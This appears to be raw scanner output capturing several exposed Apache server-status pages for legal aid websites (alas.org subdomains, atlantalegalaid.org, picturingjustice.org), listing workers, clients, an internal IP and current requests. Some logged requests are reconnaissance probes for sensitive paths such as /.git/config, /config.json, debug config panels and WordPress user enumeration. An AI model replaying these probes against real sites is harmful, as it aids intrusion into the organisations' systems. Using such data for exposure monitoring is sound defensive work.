15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 24-34136856/9/8536K 0.33307.40.05285.51 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 25-34136900/5/4735_ 0.7775970.00.09185.05 15.158.15.166http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 26-34136910/9/3256_ 0.83870.00.0986.67 15.158.15.177http/1.1secure.alas.org:8080GET / HTTP/1.1 27-34136921/3/3901K 0.75411.60.07138.11 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 28-34-0/0/2781. 0.371100.00.0087.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-34-0/0/2988. 0.41200.00.00106.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-34130074/104/4253K 4.08405.32.04127.21 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 31-34-0/0/2552. 0.522500.00.00100.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-34137164/7/3000W 0.27005.20.01116.29 70.132.4.67http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 33-34137170/3/2841_ 0.43542910.00.0392.12 15.158.15.177http/1.1esign.alas.org:8080GET / HTTP/1.1 34-34-0/0/2630. 0.523300.00.0089.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-34137192/10/3330K 0.31402.10.03112.85 70.132.4.67http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 36-34-0/0/3282. 0.523500.00.00138.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-34137210/4/3043_ 0.94506160.00.0694.15 15.158.15.177http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 38-34-0/0/2621. 0.532300.00.0091.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-34-0/0/2991. 0.433900.00.00101.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-34137360/4/1912_ 0.1084100.00.0170.66 15.158.15.173http/1.1survey.alas.org:8080GET / HTTP/1.1 41-34-0/0/483. 0.89700.00.0022.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-34137700/4/447_ 0.523670.00.0820.78 18.68.3.8http/1.1secure.alas.org:8080GET / HTTP/1.1 43-34-0/0/162. 0.09400.00.002.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-34-0/0/291. 0.512800.00.0014.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-34-0/0/237. 0.532700.00.0016.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-34137940/3/199_ 0.1384680.00.009.35 15.158.15.177http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-34137950/4/157_ 1.4849720.00.041.99 15.158.15.177http/1.1events.alas.org:8080GET / HTTP/1.1 48-34-0/0/115. 0.264800.00.002.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-34-0/0/286. 0.302400.00.008.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-34137980/3/431_ 0.028990.00.0010.41 15.158.15.173http/1.1esign.alas.org:8080GET /signin/?secure=true HTTP/1.1 51-34137990/6/117_ 0.45472770.00.062.33 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 52-34138000/4/196_ 0.7649980.00.0332.31 15.158.15.177http/1.1events.alas.org:8080GET / HTTP/1.1 53-34138010/3/206_ 0.1484670.00.0013.69 15.158.15.173http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 54-34-0/0/283. 0.303200.00.0015.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-34-0/0/77. 0.24100.00.000.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-34138270/2/101_ 0.9086990.00.092.40 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 57-34138280/5/129_ 1.08
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979000ba32e
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 15-Apr-2023 00:04:34 UTC Restart Time: Saturday, 11-Mar-2023 06:50:09 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 34 days 17 hours 14 minutes 24 seconds Server load: 2.88 1.23 0.45 Total accesses: 772623 - Total Traffic: 24.8 GB CPU Usage: u62.14 s11.23 cu0 cs0 - .00245% CPU load .258 requests/sec - 8.7 kB/second - 33.7 kB/request 20 requests currently being processed, 63 idle workers .._K.K.__._...____._.KK_K__K..K.KK.K._.._._...__..____..______.K ..K_..__.__._K._.____.._____..__.....KK.W_KK__________C__K.__... _........._._......... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-34-0/0/50495. 2.19700.00.001579.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-34-0/0/48806. 3.703800.00.001536.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-34134350/18/48224_ 2.285100.00.491444.05 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 3-34135594/12/46779K 0.29104.80.101483.14 70.132.4.67http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 4-34-0/0/47655. 0.975700.00.001591.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-34135655/16/44035K 1.33006.30.171399.95 70.132.4.67http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 6-34-0/0/44644. 0.863500.00.001335.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-34134880/13/42574_ 0.84501320.00.171308.26 15.158.15.177http/1.1survey.alas.org:8080GET / HTTP/1.1 8-34134610/15/40588_ 2.1495960.00.141269.71 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 9-34-0/0/37178. 1.401400.00.001154.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-34135660/15/34194_ 0.64461430.00.131141.54 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 11-34-0/0/31253. 0.001100.00.001077.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-34-0/0/29592. 0.10400.00.00900.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-34-0/0/23493. 0.31100.00.00856.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-34136540/5/22696_ 0.251000.00.07707.53 15.158.15.177http/1.1on.alas.org:8080GET / HTTP/1.1 15-34135970/11/20773_ 0.131090.00.05676.31 15.158.15.177http/1.1secure.alas.org:8080GET / HTTP/1.1 16-34136550/6/19806_ 0.7996220.00.10710.92 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 17-34136600/5/13147_ 0.93104610.00.14517.79 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 18-34-0/0/11122. 0.551600.00.00444.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-34136740/5/11772_ 0.495539210.00.10454.56 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 20-34-0/0/10182. 2.011000.00.00419.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-34136755/11/10312K 0.35106.30.05386.76 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 22-34129674/102/9389K 3.66105.20.58383.68 70.132.4.67http/1.1picturingjustice.org:8080GET /about HTTP/1.1 23-34136800/6/8387_ 0.8696290.00.07343.73 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 24-34136857/10/8537K 0.33108.40.05285.51 70.132.4.67http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 25-34136900/5/4735_ 0.7785970.00.09185.05 15.158.15.166http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 26-34136910/9/3256_ 0.831070.00.0986.67 15.158.15.177http/1.1secure.alas.org:8080GET / HTTP/1.1 27-34136922/4/3902K 0.75102.70.07138.11 70.132.4.89http/1.1picturingjustice.org:8080GET /debug/default/view?panel=config HTTP/1.1 28-34-0/0/2781. 0.371200.00.0087.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-34-0/0/2988. 0.41300.00.00106.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-34130076/106/4255K 4.08008.02.04127.22 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 31-34-0/0/2552. 0.522600.00.00100.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-34137166/9/3002K 0.271011.90.01116.29 70.132.4.67http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 33-34137175/8/2846K 0.43005.90.0492.13 130.176.137.155http/1.1picturingjustice.org:8080GET / HTTP/1.1 34-34-0/0/2630. 0.523400.00.0089.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-34137194/12/3332K 0.31104.30.03112.85 70.132.4.67http/1.1picturingjustice.org:8080GET /api/search?folderIds=0 HTTP/1.1 36-34-0/0/3282. 0.523600.00.00138.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-34137210/4/3043_ 0.94526160.00.0694.15 15.158.15.177http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 38-34-0/0/2621. 0.532400.00.0091.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-34-0/0/2991. 0.434000.00.00101.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-34137360/4/1912_ 0.10104100.00.0170.66 15.158.15.173http/1.1survey.alas.org:8080GET / HTTP/1.1 41-34-0/0/483. 0.89800.00.0022.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-34137700/4/447_ 0.523870.00.0820.78 18.68.3.8http/1.1secure.alas.org:8080GET / HTTP/1.1 43-34-0/0/162. 0.09500.00.002.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-34-0/0/291. 0.512900.00.0014.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-34-0/0/237. 0.532800.00.0016.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-34137940/3/199_ 0.13104680.00.009.35 15.158.15.177http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-34137950/4/157_ 1.4869720.00.041.99 15.158.15.177http/1.1events.alas.org:8080GET / HTTP/1.1 48-34-0/0/115. 0.264900.00.002.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-34-0/0/286. 0.302500.00.008.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-34137980/3/431_ 0.0210990.00.0010.41 15.158.15.173http/1.1esign.alas.org:8080GET /signin/?secure=true HTTP/1.1 51-34137990/6/117_ 0.45482770.00.062.33 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 52-34138000/4/196_ 0.7669980.00.0332.31 15.158.15.177http/1.1events.alas.org:8080GET / HTTP/1.1 53-34138010/3/206_ 0.14104670.00.0013.69 15.158.15.173http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 54-34-0/0/283. 0.303300.00.0015.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-34-0/0/77. 0.24200.00.000.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-34138270/2/101_ 0.90106990.00.092.40 15.158.15.177http/1.1elearning.alas.org:8080GET /
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9792d4cb3f5
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 15-Apr-2023 00:04:28 UTC Restart Time: Saturday, 11-Mar-2023 06:50:09 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 34 days 17 hours 14 minutes 18 seconds Server load: 3.40 1.27 0.46 Total accesses: 772555 - Total Traffic: 24.8 GB CPU Usage: u62.12 s11.22 cu0 cs0 - .00244% CPU load .258 requests/sec - 8.7 kB/second - 33.7 kB/request 19 requests currently being processed, 70 idle workers .._K.K.__._.______._.K__K___._K.K_.K._.._._C.._K..__K_._______.K ..K_..__._K._K._.___K.._____..__.....KK.K_W__________________... _........._._......... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-34-0/0/50495. 2.19100.00.001579.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-34-0/0/48806. 3.703200.00.001536.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-34134350/18/48224_ 2.284500.00.491444.05 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 3-34135592/10/46777K 0.29002.10.101483.13 70.132.4.67http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 4-34-0/0/47655. 0.975100.00.001591.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-34135652/13/44032K 1.33002.70.171399.95 70.132.4.67http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 6-34-0/0/44644. 0.862900.00.001335.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-34134880/13/42574_ 0.84441320.00.171308.26 15.158.15.177http/1.1survey.alas.org:8080GET / HTTP/1.1 8-34134610/15/40588_ 2.1425960.00.141269.71 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 9-34-0/0/37178. 1.40800.00.001154.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-34135660/15/34194_ 0.64401430.00.131141.54 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 11-34-0/0/31253. 0.00500.00.001077.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-34136440/5/29591_ 0.105118410.00.01900.20 70.132.4.67http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 13-34136450/8/23492_ 0.31491550.00.03856.29 18.68.3.8http/1.1secure.alas.org:8080GET / HTTP/1.1 14-34136540/5/22696_ 0.25400.00.07707.53 15.158.15.177http/1.1on.alas.org:8080GET / HTTP/1.1 15-34135970/11/20773_ 0.13490.00.05676.31 15.158.15.177http/1.1secure.alas.org:8080GET / HTTP/1.1 16-34136550/6/19806_ 0.7926220.00.10710.92 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 17-34136600/5/13147_ 0.9344610.00.14517.79 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 18-34-0/0/11122. 0.551000.00.00444.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-34136740/5/11772_ 0.494839210.00.10454.56 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 20-34-0/0/10182. 2.01400.00.00419.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-34136751/7/10308K 0.34001.10.04386.76 70.132.4.67http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 22-34129670/98/9385_ 3.655116560.00.58383.68 70.132.4.67http/1.1survey.alas.org:8080GET /about HTTP/1.1 23-34136800/6/8387_ 0.8626290.00.07343.73 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 24-34136853/6/8533K 0.33003.60.04285.50 70.132.4.67http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 25-34136900/5/4735_ 0.7725970.00.09185.05 15.158.15.166http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 26-34136910/9/3256_ 0.83470.00.0986.67 15.158.15.177http/1.1secure.alas.org:8080GET / HTTP/1.1 27-34136920/2/3900_ 0.755130810.00.07138.11 70.132.4.67http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 28-34-0/0/2781. 0.37600.00.0087.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-34137140/5/2987_ 0.4149370.00.02106.51 15.158.15.177http/1.1short.alas.org:8080GET / HTTP/1.1 30-34130073/103/4252K 4.08003.72.04127.21 70.132.4.67http/1.1picturingjustice.org:8080GET /api/search?folderIds=0 HTTP/1.1 31-34-0/0/2552. 0.522000.00.00100.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-34137162/5/2998K 0.27002.60.01116.28 70.132.4.67http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 33-34137170/3/2841_ 0.43492910.00.0392.12 15.158.15.177http/1.1esign.alas.org:8080GET / HTTP/1.1 34-34-0/0/2630. 0.522800.00.0089.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-34137192/10/3330K 0.31002.10.03112.85 70.132.4.67http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 36-34-0/0/3282. 0.523000.00.00138.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-34137210/4/3043_ 0.94456160.00.0694.15 15.158.15.177http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 38-34-0/0/2621. 0.531800.00.0091.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-34-0/0/2991. 0.433400.00.00101.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-34137360/4/1912_ 0.1034100.00.0170.66 15.158.15.173http/1.1survey.alas.org:8080GET / HTTP/1.1 41-34-0/0/483. 0.89200.00.0022.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-34137700/4/447_ 0.523270.00.0820.78 18.68.3.8http/1.1secure.alas.org:8080GET / HTTP/1.1 43-34137751/5/162C 0.09000.20.012.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-34-0/0/291. 0.512300.00.0014.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-34-0/0/237. 0.532200.00.0016.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-34137940/3/199_ 0.1334680.00.009.35 15.158.15.177http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-34137952/4/157K 1.48497240.30.041.99 15.158.15.177http/1.1events.alas.org:8080GET / HTTP/1.1 48-34-0/0/115. 0.264300.00.002.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-34-0/0/286. 0.301900.00.008.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-34137980/3/431_ 0.024990.00.0010.41 15.158.15.173http/1.1esign.alas.org:8080GET /signin/?secure=true HTTP/1.1 51-34137990/6/117_ 0.45422770.00.062.33 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 52-34138002/4/196K 0.76499832.10.0332.31 15.158.15.177http/1.1events.alas.org:8080GET / HTTP/1.1 53-34138010/3/206_ 0.1434670.00.0013.69 15.158.15.173http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 54-34-0/0/283. 0.302700.00.0015.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-34138260/3/76_ 0.244900.00.050.77 15.158.54.22http/1.1atlantalegalaid.org:8080GET /.git/config HTTP/1.1 56-34138270/2/101_ 0.9036990.00.09
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979da8b006e
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 15-Apr-2023 00:04:27 UTC Restart Time: Saturday, 11-Mar-2023 06:50:09 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 34 days 17 hours 14 minutes 17 seconds Server load: 3.40 1.27 0.46 Total accesses: 772531 - Total Traffic: 24.8 GB CPU Usage: u62.12 s11.22 cu0 cs0 - .00244% CPU load .258 requests/sec - 8.7 kB/second - 33.7 kB/request 9 requests currently being processed, 80 idle workers ..__._.__._.______._.___K___._K.__._._.._._C.._K..__K_._______.W ..K_..__._K.__._.___K.._____..__.....__._____________________... _........._._......... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-34-0/0/50495. 2.19100.00.001579.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-34-0/0/48806. 3.703200.00.001536.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-34134350/18/48224_ 2.284400.00.491444.05 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 3-34135590/8/46775_ 0.295016070.00.091483.13 70.132.4.67http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 4-34-0/0/47655. 0.975100.00.001591.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-34135650/11/44030_ 1.335016320.00.171399.95 70.132.4.95http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 6-34-0/0/44644. 0.862900.00.001335.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-34134880/13/42574_ 0.84441320.00.171308.26 15.158.15.177http/1.1survey.alas.org:8080GET / HTTP/1.1 8-34134610/15/40588_ 2.1425960.00.141269.71 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 9-34-0/0/37178. 1.40800.00.001154.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-34135660/15/34194_ 0.64401430.00.131141.54 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 11-34-0/0/31253. 0.00500.00.001077.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-34136440/5/29591_ 0.105018410.00.01900.20 70.132.4.67http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 13-34136450/8/23492_ 0.31491550.00.03856.29 18.68.3.8http/1.1secure.alas.org:8080GET / HTTP/1.1 14-34136540/5/22696_ 0.25300.00.07707.53 15.158.15.177http/1.1on.alas.org:8080GET / HTTP/1.1 15-34135970/11/20773_ 0.13390.00.05676.31 15.158.15.177http/1.1secure.alas.org:8080GET / HTTP/1.1 16-34136550/6/19806_ 0.7926220.00.10710.92 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 17-34136600/5/13147_ 0.9334610.00.14517.79 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 18-34-0/0/11122. 0.551000.00.00444.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-34136740/5/11772_ 0.494839210.00.10454.56 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 20-34-0/0/10182. 2.01400.00.00419.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-34136750/6/10307_ 0.345016530.00.04386.75 70.132.4.95http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 22-34129670/98/9385_ 3.655016560.00.58383.68 70.132.4.67http/1.1survey.alas.org:8080GET /about HTTP/1.1 23-34136800/6/8387_ 0.8626290.00.07343.73 15.158.15.173http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 24-34136851/4/8531K 0.33011.50.04285.50 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 25-34136900/5/4735_ 0.7725970.00.09185.05 15.158.15.166http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 26-34136910/9/3256_ 0.83370.00.0986.67 15.158.15.177http/1.1secure.alas.org:8080GET / HTTP/1.1 27-34136920/2/3900_ 0.755030810.00.07138.11 70.132.4.67http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 28-34-0/0/2781. 0.37600.00.0087.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-34137140/5/2987_ 0.4149370.00.02106.51 15.158.15.177http/1.1short.alas.org:8080GET / HTTP/1.1 30-34130071/101/4250K 4.08011.52.04127.21 70.132.4.67http/1.1picturingjustice.org:8080GET / HTTP/1.1 31-34-0/0/2552. 0.522000.00.00100.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-34137160/3/2996_ 0.275000.00.00116.28 70.132.4.95http/1.1secure.alas.org:8080GET /.git/config HTTP/1.1 33-34137170/3/2841_ 0.43492910.00.0392.12 15.158.15.177http/1.1esign.alas.org:8080GET / HTTP/1.1 34-34-0/0/2630. 0.522800.00.0089.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-34137190/8/3328_ 0.315000.00.03112.85 70.132.4.89http/1.1secure.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 36-34-0/0/3282. 0.523000.00.00138.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-34137210/4/3043_ 0.94456160.00.0694.15 15.158.15.177http/1.1intranet.alas.org:8080GET /login/ HTTP/1.1 38-34-0/0/2621. 0.531800.00.0091.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-34-0/0/2991. 0.433400.00.00101.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-34137360/4/1912_ 0.1034100.00.0170.66 15.158.15.173http/1.1survey.alas.org:8080GET / HTTP/1.1 41-34-0/0/483. 0.89200.00.0022.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-34137700/4/447_ 0.523170.00.0820.78 18.68.3.8http/1.1secure.alas.org:8080GET / HTTP/1.1 43-34137751/5/162C 0.09000.20.012.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-34-0/0/291. 0.512300.00.0014.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-34-0/0/237. 0.532200.00.0016.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-34137940/3/199_ 0.1334680.00.009.35 15.158.15.177http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-34137952/4/157K 1.48497240.30.041.99 15.158.15.177http/1.1events.alas.org:8080GET / HTTP/1.1 48-34-0/0/115. 0.264300.00.002.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-34-0/0/286. 0.301900.00.008.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-34137980/3/431_ 0.023990.00.0010.41 15.158.15.173http/1.1esign.alas.org:8080GET /signin/?secure=true HTTP/1.1 51-34137990/6/117_ 0.45422770.00.062.33 15.158.15.177http/1.1elearning.alas.org:8080GET / HTTP/1.1 52-34138002/4/196K 0.76499832.10.0332.31 15.158.15.177http/1.1events.alas.org:8080GET / HTTP/1.1 53-34138010/3/206_ 0.1434670.00.0013.69 15.158.15.173http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 54-34-0/0/283. 0.302700.00.0015.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-34138260/3/76_ 0.244900.00.050.77 15.158.54.22http/1.1atlantalegalaid.org:8080GET /.git/config HTTP/1.1 56-34138270/2/101_ 0.9036990.00.092.40 15.158.15.177http/1.1elearning.alas.org:8080GET / HT
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97950f8f6ea
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 00:03:06 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 17 hours 10 minutes 16 seconds Server load: 22.54 21.33 20.91 Total accesses: 638716 - Total Traffic: 28.5 GB CPU Usage: u157.15 s9.01 cu0 cs0 - .0164% CPU load .631 requests/sec - 29.5 kB/second - 46.8 kB/request 38 requests currently being processed, 0 idle workers KKKKKKKKKKKKKWKKWKKKKKKKKKKKKKKKKKKKW...W....................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11129863/64/35025K 13.722762.40.301636.57 15.158.40.83http/1.1secure.alas.org:8080HEAD / HTTP/1.1 